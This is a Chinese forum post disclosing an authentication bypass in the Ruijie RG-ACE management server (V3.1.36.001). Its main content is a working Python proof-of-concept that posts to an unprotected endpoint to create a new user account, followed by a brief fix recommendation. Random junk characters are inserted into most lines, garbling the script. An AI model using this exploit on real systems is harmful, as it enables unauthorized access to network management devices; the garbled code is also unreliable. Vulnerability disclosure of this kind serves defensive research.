找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2222|回复: 0
打印 上一主题 下一主题

锐捷应用控制引擎管理服务器可以增加用户

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-10 10:16:32 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
锐捷应用控制引擎管理服务器(RG-ACE系列应用控制引擎管理服务器V3.1.36.001,官网的连接 http://www.ruijie.com.cn/service/down-search.aspx 显示是最新版)可以根据没有权限验证的接口直接增加用户,连接设备,查看设备信息和报表(权限相对于默认的admin比较低)
5 E% a2 d) ]% j2 H# B0 U$ Y( V9 S% h
0 [4 q7 p7 }# C4 |/ z
1 L& s  d; v; m% }1 d测试的具体版本是
/ V/ ]- m/ R/ X) v# L产品名称: 锐捷应用控制引擎4 U$ }! Z; K7 e4 }1 V
版本号: 3.1.36.001 TC
. V3 H' y" V5 u; S/ ?9 J; n- u编译时间: 201104291730
; d2 M$ E" l8 e7 F
" C( d' Q, g1 T, H: G) Y
5 Z9 m  P  e1 N% b7 w, Z漏洞证明:
* W( p5 W! e: I. Y3 M, G" B+ u
# I# y. M/ i; j, h  U0 z' K: b- E
" \! q' T4 w& c; V! O3 ~6 D/ O) b% B6 j# _! Y% Z+ y

# F( A4 l/ w2 L4 t4 M
( o0 g' t" }0 R* E5 p% Z! a
0 b# O1 ]3 d2 A' ?$ }( |" v6 _# u, b- o执行脚本
, Z: p) }0 q' z; y2 o#! /usr/bin/env python* f4 H5 X- _3 W* B
#coding=gbk5 v6 C" ]8 Y) j! }0 x8 u
#RG-ACE管理服务器 V3.1.36.001
) J6 q+ `5 m9 i) @( Mimport urllib2, urllib,cookielib
5 g! }1 {- G2 T/ eurl=r'http://IP/mars/doInsertUserInfo.do' #IP改为装这个软件的IP
8 i0 }' n3 r+ b4 e6 L5 ?9 C0 a2 T6 _opener=urllib2.build_opener(urllib2.HTTPCookieProcessor(cookielib.CookieJar()))$ [) O5 e  |) o5 w% ?+ |
opener.addheaders = [('User-agent','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)')]
  ]8 x: u/ p# [post=(("event","userManager.doInsertUserInfo"),
$ W5 P3 n- P$ ?("useractionname","addButtonValue"),6 ]2 T2 b2 h" l
("useropermanager","userManager"),
7 }! \: \% F; ?" c! i7 g("userName","t"), #######账号自己加
% c) X0 p2 Z" W% ]5 i) p("pwd","aaaaaa"),######密码自己加: H% V0 P. p% d% E
("trueName","ad"),; V5 z8 h. b  x" T2 L% `
("email",""),4 T% w3 t! P3 e, Z
("mobilePhone",""),, q' a1 a9 w6 s
("officePhone",""),) s- k' ]" b+ _; ?" Y
("addr",""),
8 k3 M- v% I- K; \("submit","确定"))
$ P. T6 V  |/ z1 Aurllib2.install_opener(opener)/ u6 C' t' |8 A5 G1 o" v6 ?
p=urllib2.urlopen(url, urllib.urlencode(post)).read()# Z. T7 |9 t$ L9 p/ p
print "Done"# Z) k8 `# Z; D# h

8 j3 y: B# T: k0 Y3 u4 Y% _登录,连接设备/ c! d6 G/ J2 s7 Z5 J# e  l2 D9 H
3 i2 k5 S( \  L+ j8 v5 [' H6 _
$ W6 s5 W' F% \7 M7 t

( T$ D/ y8 Z% @6 B! x6 H
! c4 B! c5 P6 U- C6 f. U, x- f; y0 a3 |2 m6 B
默认的管理员admin权限更大点8 G; i' s3 w& h3 w4 O
& H2 j" `2 G8 {
& L8 _/ p- o  a5 m# `' t- ]

: |# i! {8 b# |4 _+ J7 o6 S , r, _0 y# l1 V# L; {; _$ {
1 k, ?* S8 d, w; v7 F& F
修复方案:
0 y& f+ D& _5 b+ W加强对接口的权限验证" J" ]  W' w/ q  W" P

% m' m; I! g) @: b( e
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表